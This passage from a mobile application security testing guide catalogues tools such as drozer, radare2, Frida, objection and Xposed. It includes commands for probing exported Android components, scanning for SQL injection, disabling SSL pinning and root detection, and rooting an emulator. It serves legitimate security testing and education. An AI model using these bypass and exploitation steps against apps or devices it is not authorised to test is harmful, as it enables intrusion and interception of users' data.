dz> run app.package.attacksurface <package>\n
Again, without drozer this would have required several steps. The module app.package.attacksurface
lists activities, broadcast receivers, content providers and services that are exported, hence, they are public and can be accessed through other apps. Once we have identified our attack surface, we can interact with the IPC endpoints through drozer without having to write a separate standalone app as it would be required for certain tasks such as communicating with a content provider.
For example, if the app has an exported Activity that leaks sensitive information we can invoke it with the Drozer module app.activity.start
:
dz> run app.activity.start --component <package> <component name>\n
This previous command will start the activity, hopefully leaking some sensitive information. Drozer has modules for every type of IPC mechanism. Download InsecureBankv2 if you would like to try the modules with an intentionally vulnerable application that illustrates common problems related to IPC endpoints. Pay close attention to the modules in the scanner category as they are very helpful in automatically detecting vulnerabilities even in system packages, especially if you are using a ROM provided by your cellphone company. Even SQL injection vulnerabilities in system packages by Google have been identified in the past with drozer.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0015/#other-drozer-commands","title":"Other Drozer commands","text":"Here's a non-exhaustive list of commands you can use to start exploring on Android:
# List all the installed packages\n$ dz> run app.package.list\n\n# Find the package name of a specific app\n$ dz> run app.package.list -f (string to be searched)\n\n# See basic information\n$ dz> run app.package.info -a (package name)\n\n# Identify the exported application components\n$ dz> run app.package.attacksurface (package name)\n\n# Identify the list of exported Activities\n$ dz> run app.activity.info -a (package name)\n\n# Launch the exported Activities\n$ dz> run app.activity.start --component (package name) (component name)\n\n# Identify the list of exported Broadcast receivers\n$ dz> run app.broadcast.info -a (package name)\n\n# Send a message to a Broadcast receiver\n$ dz> run app.broadcast.send --action (broadcast receiver name) -- extra (number of arguments)\n\n# Detect SQL injections in content providers\n$ dz> run scanner.provider.injection -a (package name)\n
"},{"location":"MASTG/tools/android/MASTG-TOOL-0015/#other-drozer-resources","title":"Other Drozer resources","text":"Other resources where you might find useful information are:
gplaycli is a Python based CLI tool to search, install and update Android applications from the Google Play Store. Follow the installation steps and you're ready to run it. gplaycli offers several options, please refer to its help (-h
) for more information.
If you're unsure about the package name (or AppID) of an app, you may perform a keyword based search for APKs (-s
):
$ gplaycli -s \"google keep\"\n\nTitle Creator Size Last Update AppID Version\n\nGoogle Keep - notes and lists Google LLC 15.78MB 4 Sep 2019 com.google.android.keep 193510330\nMaps - Navigate & Explore Google LLC 35.25MB 16 May 2019 com.google.android.apps.maps 1016200134\nGoogle Google LLC 82.57MB 30 Aug 2019 com.google.android.googlequicksearchbox 301008048\n
Note that regional (Google Play) restrictions apply when using gplaycli. In order to access apps that are restricted in your country you can use alternative app stores such as the ones described in \"Alternative App Stores\".
"},{"location":"MASTG/tools/android/MASTG-TOOL-0017/","title":"House","text":"House is a runtime mobile application analysis toolkit for Android apps, developed and maintained by the NCC Group and is written in Python.
It leverages a running Frida server on a rooted device or the Frida gadget in a repackaged Android app. The intention of House is to allow an easy way of prototyping Frida scripts via its convenient web GUI.
The installation instructions and \"how-to guide\" of House can be found in the Readme of the Github repo.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0018/","title":"jadx","text":"jadx (Dex to Java Decompiler) is a command line and GUI tool for producing Java source code from Android DEX and APK files - https://github.com/skylot/jadx
"},{"location":"MASTG/tools/android/MASTG-TOOL-0019/","title":"jdb","text":"A Java Debugger which allows to set breakpoints and print application variables. jdb uses the JDWP protocol - https://docs.oracle.com/javase/7/docs/technotes/tools/windows/jdb.html
"},{"location":"MASTG/tools/android/MASTG-TOOL-0020/","title":"JustTrustMe","text":"An Xposed Module to bypass SSL certificate pinning - https://github.com/Fuzion24/JustTrustMe
"},{"location":"MASTG/tools/android/MASTG-TOOL-0021/","title":"Magisk","text":"Magisk
(\"Magic Mask\") is one way to root your Android device. Its specialty lies in the way the modifications on the system are performed. While other rooting tools alter the actual data on the system partition, Magisk does not (which is called \"systemless\"). This enables a way to hide the modifications from root-sensitive applications (e.g. for banking or games) and allows using the official Android OTA upgrades without the need to unroot the device beforehand.
You can get familiar with Magisk reading the official documentation on GitHub. If you don't have Magisk installed, you can find installation instructions in the documentation. If you use an official Android version and plan to upgrade it, Magisk provides a tutorial on GitHub.
Learn more about rooting your device with Magisk.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0022/","title":"Proguard","text":"ProGuard is a free Java class file shrinker, optimizer, obfuscator, and preverifier. It detects and removes unused classes, fields, methods, and attributes and can also be used to delete logging-related code.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0023/","title":"RootCloak Plus","text":"A Cydia Substrate Module used to check for commonly known indications of root - https://github.com/devadvance/rootcloakplus
"},{"location":"MASTG/tools/android/MASTG-TOOL-0024/","title":"Scrcpy","text":"Scrcpy provides display and control of Android devices connected over USB (or TCP/IP). It does not require any root access and it works on GNU/Linux, Windows and macOS.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0025/","title":"SSLUnpinning","text":"An Xposed Module to bypass SSL certificate pinning - https://github.com/ac-pm/SSLUnpinning_Xposed
"},{"location":"MASTG/tools/android/MASTG-TOOL-0026/","title":"Termux","text":"Termux is a terminal emulator for Android that provides a Linux environment that works directly with or without rooting and with no setup required. The installation of additional packages is a trivial task thanks to its own APT package manager (which makes a difference in comparison to other terminal emulator apps). You can search for specific packages by using the command pkg search <pkg_name>
and install packages with pkg install <pkg_name>
. You can install Termux straight from Google Play.
Xposed does not work on Android 9 (API level 28). However, it was unofficially ported in 2019 under the name EdXposed, supporting Android 8-10 (API level 26 till 29). You can find the code and usage examples at EdXposed Github repo.
Xposed is a framework that allows you to modify the system or application aspect and behavior at runtime, without modifying any Android application package (APK) or re-flashing. Technically, it is an extended version of Zygote that exports APIs for running Java code when a new process is started. Running Java code in the context of the newly instantiated app makes it possible to resolve, hook, and override Java methods belonging to the app. Xposed uses reflection to examine and modify the running app. Changes are applied in memory and persist only during the process' runtime since the application binaries are not modified.
To use Xposed, you need to first install the Xposed framework on a rooted device as explained on XDA-Developers Xposed framework hub. Modules can be installed through the Xposed Installer app, and they can be toggled on and off through the GUI.
Note: given that a plain installation of the Xposed framework is easily detected with SafetyNet, we recommend using Magisk to install Xposed. This way, applications with SafetyNet attestation should have a higher chance of being testable with Xposed modules.
Xposed has been compared to Frida. When you run Frida server on a rooted device, you will end up with a similarly effective setup. Both frameworks deliver a lot of value when you want to do dynamic instrumentation. When Frida crashes the app, you can try something similar with Xposed. Next, similar to the abundance of Frida scripts, you can easily use one of the many modules that come with Xposed, such as the earlier discussed module to bypass SSL pinning (JustTrustMe and SSLUnpinning). Xposed includes other modules, such as Inspeckage which allow you to do more in depth application testing as well. On top of that, you can create your own modules as well to patch often used security mechanisms of Android applications.
Xposed can also be installed on an emulator through the following script:
#!/bin/sh\necho \"Start your emulator with 'emulator -avd NAMEOFX86A8.0 -writable-system -selinux permissive -wipe-data'\"\nadb root && adb remount\nadb install SuperSU\\ v2.79.apk #binary can be downloaded from http://www.supersu.com/download\nadb push root_avd-master/SuperSU/x86/su /system/xbin/su\nadb shell chmod 0755 /system/xbin/su\nadb shell setenforce 0\nadb shell su --install\nadb shell su --daemon&\nadb push busybox /data/busybox #binary can be downloaded from https://busybox.net/\n# adb shell \"mount -o remount,rw /system && mv /data/busybox /system/bin/busybox && chmod 755 /system/bin/busybox && /system/bin/busybox --install /system/bin\"\nadb shell chmod 755 /data/busybox\nadb shell 'sh -c \"./data/busybox --install /data\"'\nadb shell 'sh -c \"mkdir /data/xposed\"'\nadb push xposed8.zip /data/xposed/xposed.zip #can be downloaded from https://dl-xda.xposed.info/framework/\nadb shell chmod 0755 /data/xposed\nadb shell 'sh -c \"./data/unzip /data/xposed/xposed.zip -d /data/xposed/\"'\nadb shell 'sh -c \"cp /data/xposed/xposed/META-INF/com/google/android/*.* /data/xposed/xposed/\"'\necho \"Now adb shell and do 'su', next: go to ./data/xposed/xposed, make flash-script.sh executable and run it in that directory after running SUperSU\"\necho \"Next, restart emulator\"\necho \"Next, adb install XposedInstaller_3.1.5.apk\"\necho \"Next, run installer and then adb reboot\"\necho \"Want to use it again? Start your emulator with 'emulator -avd NAMEOFX86A8.0 -writable-system -selinux permissive'\"\n
"},{"location":"MASTG/tools/android/MASTG-TOOL-0028/","title":"radare2 for Android","text":"radare2 (r2) is a popular open source reverse engineering framework for disassembling, debugging, patching and analyzing binaries that is scriptable and supports many architectures and file formats including Android and iOS apps. For Android, Dalvik DEX (odex, multidex), ELF (executables, .so, ART) and Java (JNI and Java classes) are supported. It also contains several useful scripts that can help you during mobile application analysis as it offers low level disassembling and safe static analysis that comes in handy when traditional tools fail.
radare2 implements a rich command line interface (CLI) where you can perform the mentioned tasks. However, if you're not really comfortable using the CLI for reverse engineering you may want to consider using the Web UI (via the -H
flag) or the even more convenient Qt and C++ GUI version called iaito. Do keep in mind that the CLI, and more concretely its Visual Mode and its scripting capabilities (r2pipe), are the core of radare2's power and it's definitely worth learning how to use it.
Please refer to radare2's official installation instructions. We highly recommend always installing radare2 from the GitHub version instead of via common package managers such as APT. Radare2 is in very active development, which means that third party repositories are often outdated.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0028/#using-radare2","title":"Using radare2","text":"The radare2 framework comprises a set of small utilities that can be used from the r2 shell or independently as CLI tools. These utilities include rabin2
, rasm2
, rahash2
, radiff2
, rafind2
, ragg2
, rarun2
, rax2
, and of course r2
, which is the main one.
For example, you can use rafind2
to read strings directly from an encoded Android Manifest (AndroidManifest.xml):
# Permissions\n$ rafind2 -ZS permission AndroidManifest.xml\n# Activities\n$ rafind2 -ZS activity AndroidManifest.xml\n# Content providers\n$ rafind2 -ZS provider AndroidManifest.xml\n# Services\n$ rafind2 -ZS service AndroidManifest.xml\n# Receivers\n$ rafind2 -ZS receiver AndroidManifest.xml\n
Or use rabin2
to get information about a binary file:
$ rabin2 -I UnCrackable-Level1/classes.dex\narch dalvik\nbaddr 0x0\nbinsz 5528\nbintype class\nbits 32\ncanary false\nretguard false\nclass 035\ncrypto false\nendian little\nhavecode true\nladdr 0x0\nlang dalvik\nlinenum false\nlsyms false\nmachine Dalvik VM\nmaxopsz 16\nminopsz 1\nnx false\nos linux\npcalign 0\npic false\nrelocs false\nsanitiz false\nstatic true\nstripped false\nsubsys java\nva true\nsha1 12-5508c b7fafe72cb521450c4470043caa332da61d1bec7\nadler32 12-5528c 00000000\n
Type rabin2 -h
to see all options:
$ rabin2 -h\nUsage: rabin2 [-AcdeEghHiIjlLMqrRsSUvVxzZ] [-@ at] [-a arch] [-b bits] [-B addr]\n [-C F:C:D] [-f str] [-m addr] [-n str] [-N m:M] [-P[-P] pdb]\n [-o str] [-O str] [-k query] [-D lang symname] file\n -@ [addr] show section, symbol or import at addr\n -A list sub-binaries and their arch-bits pairs\n -a [arch] set arch (x86, arm, .. or <arch>_<bits>)\n -b [bits] set bits (32, 64 ...)\n -B [addr] override base address (pie bins)\n -c list classes\n -cc list classes in header format\n -H header fields\n -i imports (symbols imported from libraries)\n -I binary info\n -j output in json\n ...\n
Use the main r2
utility to access the r2 shell. You can load DEX binaries just like any other binary:
r2 classes.dex\n
Enter r2 -h
to see all available options. A very commonly used flag is -A
, which triggers an analysis after loading the target binary. However, this should be used sparingly and with small binaries as it is very time and resource consuming. You can learn more about this in the chapter \"Tampering and Reverse Engineering on Android\".
Once in the r2 shell, you can also access functions offered by the other radare2 utilities. For example, running i
will print the information of the binary, exactly as rabin2 -I
does.
To print all the strings use rabin2 -Z
or the command iz
(or the less verbose izq
) from the r2 shell.
[0x000009c8]> izq\n0xc50 39 39 /dev/com.koushikdutta.superuser.daemon/\n0xc79 25 25 /system/app/Superuser.apk\n...\n0xd23 44 44 5UJiFctbmgbDoLXmpL12mkno8HT4Lv8dlat8FxR2GOc=\n0xd51 32 32 8d127684cbc37c17616d806cf50473cc\n0xd76 6 6 <init>\n0xd83 10 10 AES error:\n0xd8f 20 20 AES/ECB/PKCS7Padding\n0xda5 18 18 App is debuggable!\n0xdc0 9 9 CodeCheck\n0x11ac 7 7 Nope...\n0x11bf 14 14 Root detected!\n
Most of the time you can append special options to your commands such as q
to make the command less verbose (quiet) or j
to give the output in JSON format (use ~{}
to prettify the JSON string).
[0x000009c8]> izj~{}\n[\n {\n \"vaddr\": 3152,\n \"paddr\": 3152,\n \"ordinal\": 1,\n \"size\": 39,\n \"length\": 39,\n \"section\": \"file\",\n \"type\": \"ascii\",\n \"string\": \"L2Rldi9jb20ua291c2hpa2R1dHRhLnN1cGVydXNlci5kYWVtb24v\"\n },\n {\n \"vaddr\": 3193,\n \"paddr\": 3193,\n \"ordinal\": 2,\n \"size\": 25,\n \"length\": 25,\n \"section\": \"file\",\n \"type\": \"ascii\",\n \"string\": \"L3N5c3RlbS9hcHAvU3VwZXJ1c2VyLmFwaw==\"\n },\n
You can print the class names and their methods with the r2 command ic
(information classes).
[0x000009c8]> ic\n...\n0x0000073c [0x00000958 - 0x00000abc] 356 class 5 Lsg/vantagepoint/uncrackable1/MainActivity\n:: Landroid/app/Activity;\n0x00000958 method 0 pC Lsg/vantagepoint/uncrackable1/MainActivity.method.<init>()V\n0x00000970 method 1 P Lsg/vantagepoint/uncrackable1/MainActivity.method.a(Ljava/lang/String;)V\n0x000009c8 method 2 r Lsg/vantagepoint/uncrackable1/MainActivity.method.onCreate (Landroid/os/Bundle;)V\n0x00000a38 method 3 p Lsg/vantagepoint/uncrackable1/MainActivity.method.verify (Landroid/view/View;)V\n0x0000075c [0x00000acc - 0x00000bb2] 230 class 6 Lsg/vantagepoint/uncrackable1/a :: Ljava/lang/Object;\n0x00000acc method 0 sp Lsg/vantagepoint/uncrackable1/a.method.a(Ljava/lang/String;)Z\n0x00000b5c method 1 sp Lsg/vantagepoint/uncrackable1/a.method.b(Ljava/lang/String;)[B\n
You can print the imported methods with the r2 command ii
(information imports).
[0x000009c8]> ii\n[Imports]\nNum Vaddr Bind Type Name\n...\n 29 0x000005cc NONE FUNC Ljava/lang/StringBuilder.method.append(Ljava/lang/String;) Ljava/lang/StringBuilder;\n 30 0x000005d4 NONE FUNC Ljava/lang/StringBuilder.method.toString()Ljava/lang/String;\n 31 0x000005dc NONE FUNC Ljava/lang/System.method.exit(I)V\n 32 0x000005e4 NONE FUNC Ljava/lang/System.method.getenv(Ljava/lang/String;)Ljava/lang/String;\n 33 0x000005ec NONE FUNC Ljavax/crypto/Cipher.method.doFinal([B)[B\n 34 0x000005f4 NONE FUNC Ljavax/crypto/Cipher.method.getInstance(Ljava/lang/String;) Ljavax/crypto/Cipher;\n 35 0x000005fc NONE FUNC Ljavax/crypto/Cipher.method.init(ILjava/security/Key;)V\n 36 0x00000604 NONE FUNC Ljavax/crypto/spec/SecretKeySpec.method.<init>([BLjava/lang/String;)V\n
A common approach when inspecting a binary is to search for something, navigate to it and visualize it in order to interpret the code. One of the ways to find something using radare2 is by filtering the output of specific commands, i.e. to grep them using ~
plus a keyword (~+
for case-insensitive). For example, we might know that the app is verifying something, we can inspect all radare2 flags and see where we find something related to \"verify\".
When loading a file, radare2 tags everything it's able to find. These tagged names or references are called flags. You can access them via the command f
.
In this case we will grep the flags using the keyword \"verify\":
[0x000009c8]> f~+verify\n0x00000a38 132 sym.Lsg_vantagepoint_uncrackable1_MainActivity.method. \\\nverify_Landroid_view_View__V\n0x00000a38 132 method.public.Lsg_vantagepoint_uncrackable1_MainActivity. \\\nLsg_vantagepoint_uncrackable1\n _MainActivity.method.verify_Landroid_view_View__V\n0x00001400 6 str.verify\n
It seems that we've found one method in 0x00000a38 (that was tagged two times) and one string in 0x00001400. Let's navigate (seek) to that method by using its flag:
[0x000009c8]> s sym.Lsg_vantagepoint_uncrackable1_MainActivity.method. \\\nverify_Landroid_view_View__V\n
And of course you can also use the disassembler capabilities of r2 and print the disassembly with the command pd
(or pdf
if you know you're already located in a function).
[0x00000a38]> pd\n
r2 commands normally accept options (see pd?
), e.g. you can limit the opcodes displayed by appending a number (\"N\") to the command pd N
.
Instead of just printing the disassembly to the console you may want to enter the so-called Visual Mode by typing V
.
By default, you will see the hexadecimal view. By typing p
you can switch to different views, such as the disassembly view:
Radare2 offers a Graph Mode that is very useful to follow the flow of the code. You can access it from the Visual Mode by typing V
:
This is only a selection of some radare2 commands to start getting some basic information from Android binaries. Radare2 is very powerful and has dozens of commands that you can find on the radare2 command documentation. Radare2 will be used throughout the guide for different purposes such as reversing code, debugging or performing binary analysis. We will also use it in combination with other frameworks, especially Frida (see the r2frida section for more information).
Please refer to the chapter \"Tampering and Reverse Engineering on Android\" for more detailed use of radare2 on Android, especially when analyzing native libraries. You may also want to read the official radare2 book.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0029/","title":"objection for Android","text":"Objection offers several features specific to Android. You can find the full list of features on the project's page, but here are a few interesting ones:
If you have a rooted device with frida-server installed, Objection can connect directly to the running Frida server to provide all its functionality without needing to repackage the application. However, it is not always possible to root an Android device or the app may contain advanced RASP controls for root detection, so injecting a frida-gadget may be the easiest way to bypass those controls.
The ability to perform advanced dynamic analysis on non-rooted devices is one of the features that makes Objection incredibly useful. After following the repackaging process you will be able to run all the aforementioned commands which make it very easy to quickly analyze an application, or bypass basic security controls.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0029/#using-objection-on-android","title":"Using Objection on Android","text":"Starting up Objection depends on whether you've patched the APK or whether you are using a rooted device running Frida-server. For running a patched APK, objection will automatically find any attached devices and search for a listening Frida gadget. However, when using frida-server, you need to explicitly tell frida-server which application you want to analyze.
# Connecting to a patched APK\nobjection explore\n\n# Find the correct name using frida-ps\n$ frida-ps -Ua | grep -i telegram\n30268 Telegram org.telegram.messenger\n\n# Connecting to the Telegram app through Frida-server\n$ objection --gadget=\"org.telegram.messenger\" explore\n
Once you are in the Objection REPL, you can execute any of the available commands. Below is an overview of some of the most useful ones:
# Show the different storage locations belonging to the app\n$ env\n\n# Disable popular ssl pinning methods\n$ android sslpinning disable\n\n# List items in the keystore\n$ android keystore list\n\n# Try to circumvent root detection\n$ android root disable\n
More information on using the Objection REPL can be found on the Objection Wiki
"},{"location":"MASTG/tools/android/MASTG-TOOL-0030/","title":"Angr","text":"Angr is a Python framework for analyzing binaries. It is useful for both static and dynamic symbolic (\"concolic\") analysis. In other words: given a binary and a requested state, Angr will try to get to that state, using formal methods (a technique used for static code analysis) to find a path, as well as brute forcing. Using angr to get to the requested state is often much faster than taking manual steps for debugging and searching the path towards the required state. Angr operates on the VEX intermediate language and comes with a loader for ELF/ARM binaries, so it is perfect for dealing with native code, such as native Android binaries.
Angr allows for disassembly, program instrumentation, symbolic execution, control-flow analysis, data-dependency analysis, decompilation and more, given a large set of plugins.
Since version 8, Angr is based on Python 3, and can be installed with pip on *nix operating systems, macOS and Windows:
pip install angr\n
Some of angr's dependencies contain forked versions of the Python modules Z3 and PyVEX, which would overwrite the original versions. If you're using those modules for anything else, you should create a dedicated virtual environment with Virtualenv. Alternatively, you can always use the provided docker container. See the installation guide for more details.
Comprehensive documentation, including an installation guide, tutorials, and usage examples are available on Angr's Gitbooks page. A complete API reference is also available.
You can use angr from a Python REPL - such as iPython - or script your approaches. Although angr has a bit of a steep learning curve, we do recommend using it when you want to brute force your way to a given state of an executable. Please see the \"Symbolic Execution\" section of the \"Reverse Engineering and Tampering\" chapter as a great example on how this can work.
"},{"location":"MASTG/tools/android/MASTG-TOOL-0099/","title":"FlowDroid","text":"FlowDroid is an open-source tool based on Soot, a framework dedicated to analyzing and translating Java bytecode for easier analysis. The tool handles the nuances of Android app lifecycles (like onCreate
, onStart
, onPause
, and others) and its UI components during analysis and performs taint analysis that is:
FlowDroid can be used in two ways: as a standalone command line tool for quick analyses or as a library for more complex investigations. In addition to performing taint analysis, FlowDroid can also generate call graphs, as illustrated in this blog post.
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0031/","title":"Frida","text":"Frida is a free and open source dynamic code instrumentation toolkit written by Ole Andr\u00e9 Vadla Ravn\u00e5s that works by injecting the QuickJS JavaScript engine (previously Duktape and V8) into the instrumented process. Frida lets you execute snippets of JavaScript into native apps on Android and iOS (as well as on other platforms).
To install Frida locally, simply run:
pip install frida-tools\n
Or refer to the installation page for more details.
Code can be injected in several ways. For example, Xposed permanently modifies the Android app loader, providing hooks for running your own code every time a new process is started. In contrast, Frida implements code injection by writing code directly into the process memory. When attached to a running app:
frida-agent.so
).Frida offers three modes of operation:
LD_PRELOAD
or DYLD_INSERT_LIBRARIES
. You can configure the frida-gadget to run autonomously and load a script from the filesystem (e.g. path relative to where the Gadget binary resides).Independently of the chosen mode, you can make use of the Frida JavaScript APIs to interact with the running process and its memory. Some of the fundamental APIs are:
Frida also provides a couple of simple tools built on top of the Frida API and available right from your terminal after installing frida-tools via pip. For instance:
frida
) for quick script prototyping and try/error scenarios.frida-ps
to obtain a list of all apps (or processes) running on the device including their names, identifiers and PIDs.frida-ls-devices
to list your connected devices running Frida servers or agents.frida-trace
to quickly trace methods that are part of an iOS app or that are implemented inside an Android native library.In addition, you'll also find several open source Frida-based tools, such as:
We will be using all of these tools throughout the guide.
You can use these tools as-is, tweak them to your needs, or take as excellent examples on how to use the APIs. Having them as an example is very helpful when you write your own hooking scripts or when you build introspection tools to support your reverse engineering workflow.
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0032/","title":"Frida CodeShare","text":"Frida CodeShare is a repository containing a collection of ready-to-run Frida scripts which can enormously help when performing concrete tasks both on Android as on iOS as well as also serve as inspiration to build your own scripts. Two representative examples are:
Using them is as simple as including the --codeshare <handler>
flag and a handler when using the Frida CLI. For example, to use \"ObjC method observer\", enter the following:
frida --codeshare mrmacete/objc-method-observer -f YOUR_BINARY\n
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0033/","title":"Ghidra","text":"Ghidra is an open source software reverse engineering (SRE) suite of tools developed by the United State of America's National Security Agency's (NSA) Research Directorate. Ghidra is a versatile tool which comprises of a disassembler, decompiler and a built-in scripting engine for advanced usage. Please refer to the installation guide on how to install it and also look at the cheat sheet for a first overview of available commands and shortcuts. In this section, we will have walk-through on how to create a project, view disassembly and decompiled code for a binary.
Start Ghidra using ghidraRun
(*nix) or ghidraRun.bat
(Windows), depending on the platform you are on. Once Ghidra is fired up, create a new project by specifying the project directory. You will be greeted by a window as shown below:
In your new Active Project you can import an app binary by going to File -> Import File and choosing the desired file.
If the file can be properly processed, Ghidra will show meta-information about the binary before starting the analysis.
To get the disassembled code for the binary file chosen above, double click the imported file from the Active Project window. Click yes and analyze for auto-analysis on the subsequent windows. Auto-analysis will take some time depending on the size of the binary, the progress can be tracked in the bottom right corner of the code browser window. Once auto-analysis is completed you can start exploring the binary.
The most important windows to explore a binary in Ghidra are the Listing (Disassembly) window, the Symbol Tree window and the Decompiler window, which shows the decompiled version of the function selected for disassembly. The Display Function Graph option shows control flow graph of the selected function.
There are many other functionalities available in Ghidra and most of them can be explored by opening the Window menu. For example, if you want to examine the strings present in the binary, open the Defined Strings option. We will discuss other advanced functionalities while analyzing various binaries for Android and iOS platforms in the coming chapters.
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0034/","title":"LIEF","text":"The purpose of LIEF is to provide a cross platform library to parse, modify and abstract ELF, PE and MachO formats. With it you can, for instance, inject a certain library as a dependency of a native library, which an application already loads by default. - https://lief.quarkslab.com/
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0035/","title":"MobSF","text":"MobSF (Mobile Security Framework) is an automated, all-in-one mobile application pentesting framework capable of performing static and dynamic analysis. The easiest way of getting MobSF started is via Docker.
docker pull opensecurity/mobile-security-framework-mobsf\ndocker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest\n
Or install and start it locally on your host computer by running:
# Setup\ngit clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git\ncd Mobile-Security-Framework-MobSF\n./setup.sh # For Linux and Mac\nsetup.bat # For Windows\n\n# Installation process\n./run.sh # For Linux and Mac\nrun.bat # For Windows\n
Once you have MobSF up and running you can open it in your browser by navigating to http://127.0.0.1:8000. Simply drag the APK you want to analyze into the upload area and MobSF will start its job.
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0036/","title":"r2frida","text":"r2frida is a project that allows radare2 to connect to Frida, effectively merging the powerful reverse engineering capabilities of radare2 with the dynamic instrumentation toolkit of Frida. r2frida can be used in both on Android and iOS, allowing you to:
Please refer to r2frida's official installation instructions.
With frida-server running, you should now be able to attach to it using the pid, spawn path, host and port, or device-id. For example, to attach to PID 1234:
r2 frida://1234\n
For more examples on how to connect to frida-server, see the usage section in the r2frida's README page.
The following examples were executed using an Android app but also apply to iOS apps.
Once in the r2frida session, all commands start with :
or =!
. For example, in radare2 you'd run i
to display the binary information, but in r2frida you'd use :i
.
See all options with r2 frida://?
.
[0x00000000]> :i\narch x86\nbits 64\nos linux\npid 2218\nuid 1000\nobjc false\nruntime V8\njava false\ncylang false\npageSize 4096\npointerSize 8\ncodeSigningPolicy optional\nisDebuggerAttached false\n
To search in memory for a specific keyword, you may use the search command \\/
:
[0x00000000]> \\/ unacceptable\nSearching 12 bytes: 75 6e 61 63 63 65 70 74 61 62 6c 65\nSearching 12 bytes in [0x0000561f05ebf000-0x0000561f05eca000]\n...\nSearching 12 bytes in [0xffffffffff600000-0xffffffffff601000]\nhits: 23\n0x561f072d89ee hit12_0 unacceptable policyunsupported md algorithmvar bad valuec\n0x561f0732a91a hit12_1 unacceptableSearching 12 bytes: 75 6e 61 63 63 65 70 74 61\n
To output the search results in JSON format, we simply add j
to our previous search command (just as we do in the r2 shell). This can be used in most of the commands:
[0x00000000]> \\/j unacceptable\nSearching 12 bytes: 75 6e 61 63 63 65 70 74 61 62 6c 65\nSearching 12 bytes in [0x0000561f05ebf000-0x0000561f05eca000]\n...\nSearching 12 bytes in [0xffffffffff600000-0xffffffffff601000]\nhits: 23\n{\"address\":\"0x561f072c4223\",\"size\":12,\"flag\":\"hit14_1\",\"content\":\"unacceptable \\\npolicyunsupported md algorithmvar bad valuec0\"},{\"address\":\"0x561f072c4275\", \\\n\"size\":12,\"flag\":\"hit14_2\",\"content\":\"unacceptableSearching 12 bytes: 75 6e 61 \\\n63 63 65 70 74 61\"},{\"address\":\"0x561f072c42c8\",\"size\":12,\"flag\":\"hit14_3\", \\\n\"content\":\"unacceptableSearching 12 bytes: 75 6e 61 63 63 65 70 74 61 \"},\n...\n
To list the loaded libraries use the command :il
and filter the results using the internal grep from radare2 with the command ~
. For example, the following command will list the loaded libraries matching the keywords keystore
, ssl
and crypto
:
[0x00000000]> :il~keystore,ssl,crypto\n0x00007f3357b8e000 libssl.so.1.1\n0x00007f3357716000 libcrypto.so.1.1\n
Similarly, to list the exports and filter the results by a specific keyword:
[0x00000000]> :iE libssl.so.1.1~CIPHER\n0x7f3357bb7ef0 f SSL_CIPHER_get_bits\n0x7f3357bb8260 f SSL_CIPHER_find\n0x7f3357bb82c0 f SSL_CIPHER_get_digest_nid\n0x7f3357bb8380 f SSL_CIPHER_is_aead\n0x7f3357bb8270 f SSL_CIPHER_get_cipher_nid\n0x7f3357bb7ed0 f SSL_CIPHER_get_name\n0x7f3357bb8340 f SSL_CIPHER_get_auth_nid\n0x7f3357bb7930 f SSL_CIPHER_description\n0x7f3357bb8300 f SSL_CIPHER_get_kx_nid\n0x7f3357bb7ea0 f SSL_CIPHER_get_version\n0x7f3357bb7f10 f SSL_CIPHER_get_id\n
To list or set a breakpoint use the command db. This is useful when analyzing/modifying memory:
[0x00000000]> :db\n
Finally, remember that you can also run Frida JavaScript code with \\.
plus the name of the script:
[0x00000000]> \\. agent.js\n
You can find more examples on how to use r2frida on their Wiki project.
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0037/","title":"RMS Runtime Mobile Security","text":"RMS - Runtime Mobile Security is a runtime mobile application analysis toolkit, supporting Android and iOS Apps. It offers a web GUI and is written in Python.
It's leveraging a running Frida server on a jailbroken device with the following out-of-box functionalities:
The installation instructions and \"how-to guide\" of RMS can be found in the Readme of the Github repo.
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0038/","title":"objection","text":"Objection is a \"runtime mobile exploration toolkit, powered by Frida\". Its main goal is to allow security testing on non-rooted devices through an intuitive interface.
Objection achieves this goal by providing you with the tools to easily inject the Frida gadget into an application by repackaging it. This way, you can deploy the repackaged app to the non-rooted/non-jailbroken device by sideloading it. Objection also provides a REPL that allows you to interact with the application, giving you the ability to perform any action that the application can perform.
Objection can be installed through pip as described on Objection's Wiki.
pip3 install objection\n
"},{"location":"MASTG/tools/generic/MASTG-TOOL-0098/","title":"iaito","text":"Iaito is the official graphical user interface for radare2, an open-source reverse engineering framework. This user-friendly tool simplifies the reverse engineering process by providing a graphical interface that integrates seamlessly with radare2's powerful features. With a focus on simplicity, keybindings, and radare2-style workflows, Iaito is a valuable resource for both experienced reverse engineers and those new to the field, offering a more accessible and efficient way to work with radare2.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0039/","title":"Frida for iOS","text":"Frida supports interaction with the Objective-C runtime through the ObjC API. You'll be able to hook and call both Objective-C and native functions inside the process and its native libraries. Your JavaScript snippets have full access to memory, e.g. to read and/or write any structured data.
Here are some tasks that Frida APIs offers and are relevant or exclusive on iOS:
Remember that on iOS, you can also benefit from the built-in tools provided when installing Frida, which include the Frida CLI (frida
), frida-ps
, frida-ls-devices
and frida-trace
, to name a few.
There's a frida-trace
feature exclusive on iOS worth highlighting: tracing Objective-C APIs using the -m
flag and wildcards. For example, tracing all methods including \"HTTP\" in their name and belonging to any class whose name starts with \"NSURL\" is as easy as running:
frida-trace -U YourApp -m \"*[NSURL* *HTTP*]\"\n
For a quick start you can go through the iOS examples.
"},{"location":"MASTG/tools/ios/MASTG-TOOL-0039/#installing-frida-on-ios","title":"Installing Frida on iOS","text":"To connect Frida to an iOS app, you need a way to inject the Frida runtime into that app. This is easy to do on a jailbroken device: just install frida-server
through Cydia. Once it has been installed, the Frida server will automatically run with root privileges, allowing you to easily inject code into any process.
